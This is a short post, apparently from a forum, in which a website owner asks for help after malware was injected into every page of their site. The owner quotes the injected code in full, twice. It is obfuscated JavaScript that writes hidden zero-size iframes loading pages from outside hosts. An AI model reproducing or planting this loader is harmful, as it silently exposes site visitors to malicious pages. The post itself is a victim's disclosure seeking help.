Tweet
A REAL addition to my website
This wonderful little piece of malware was added to every page of my website...how nice. But not only that a russian porn site was redirecting from my site to theirs. I now had to re publish all my pages as I didn't know how to take the code out of all the pages globally.
The big question is..Does the server have an anti malware or anti vrus that should be detecting this type of thing?
the POS code was this...</body>
</html><script language=javascript>document.write(unescape('%3C%7 3%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22% 6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74 %69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3 D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74% 72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B %20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%3 0%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B% 29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68 %61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%6 4%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28% 73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F %63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%7 3%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69% 70%74%3E'));dF('%264Djgsbnf%2631tsd%264E%2633iuuq% 264B00ebtsfuplgjo/dpn0joefy/qiq%2633%2631xjeui%264E%26331%2633%2631ifjhiu%264E %26331%2633%2631tuzmf%264E%2633ejtqmbz%264Bopof%26 4C%2633%264F%264D0jgsbnf%264F1')</script><script> eval(unescape("document.write%28String.fromCharCod e%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C1 15%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C 58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C 111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109% 2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C10 4%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C 61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C1 04%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C12 1%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C 108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2 C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C 101%2C62%29%29%3B"));</script><script> eval(unescape("document.write%28String.fromCharCod e%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C1 15%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C 58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C 111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109% 2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C10 4%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C 61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C1 04%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C12 1%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C 108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2 C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C 101%2C62%29%29%3B")); </script><script>document.write(unescape("%3Ciframe% 20src%3D%22http%3A%2F%2Fdasretokfin.com%2Findex.ph p%22%20width%3D%220%22%20height%3D%220%22%20style% 3D%22display%3Anone%3B%22%3E%3C%2Fiframe%3E")); </script><script language="javascript">
document.write( unescape( '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65% 3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%64 %6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%6 9%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A% 2F%2F%35%72%75%62%6C%65%69%2E%63%6F%6D%2F%75%6E%69 %71%75%65%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%6 9%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22% 30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79 %3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3 E%27%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A' ) );
</script>
now how did this get on my site???????
www.churchofrealtruth.com
The big question is..Does the server have an anti malware or anti vrus that should be detecting this type of thing?
the POS code was this...</body>
</html><script language=javascript>document.write(unescape('%3C%7 3%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22% 6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74 %69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3 D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74% 72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B %20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%3 0%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B% 29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68 %61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%6 4%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28% 73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F %63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%7 3%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69% 70%74%3E'));dF('%264Djgsbnf%2631tsd%264E%2633iuuq% 264B00ebtsfuplgjo/dpn0joefy/qiq%2633%2631xjeui%264E%26331%2633%2631ifjhiu%264E %26331%2633%2631tuzmf%264E%2633ejtqmbz%264Bopof%26 4C%2633%264F%264D0jgsbnf%264F1')</script><script> eval(unescape("document.write%28String.fromCharCod e%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C1 15%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C 58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C 111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109% 2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C10 4%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C 61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C1 04%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C12 1%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C 108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2 C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C 101%2C62%29%29%3B"));</script><script> eval(unescape("document.write%28String.fromCharCod e%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C1 15%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C 58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C 111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109% 2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C10 4%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C 61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C1 04%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C12 1%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C 108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2 C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C 101%2C62%29%29%3B")); </script><script>document.write(unescape("%3Ciframe% 20src%3D%22http%3A%2F%2Fdasretokfin.com%2Findex.ph p%22%20width%3D%220%22%20height%3D%220%22%20style% 3D%22display%3Anone%3B%22%3E%3C%2Fiframe%3E")); </script><script language="javascript">
document.write( unescape( '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65% 3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%64 %6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%6 9%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A% 2F%2F%35%72%75%62%6C%65%69%2E%63%6F%6D%2F%75%6E%69 %71%75%65%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%6 9%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22% 30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79 %3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3 E%27%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A' ) );
</script>
now how did this get on my site???????
www.churchofrealtruth.com
Comment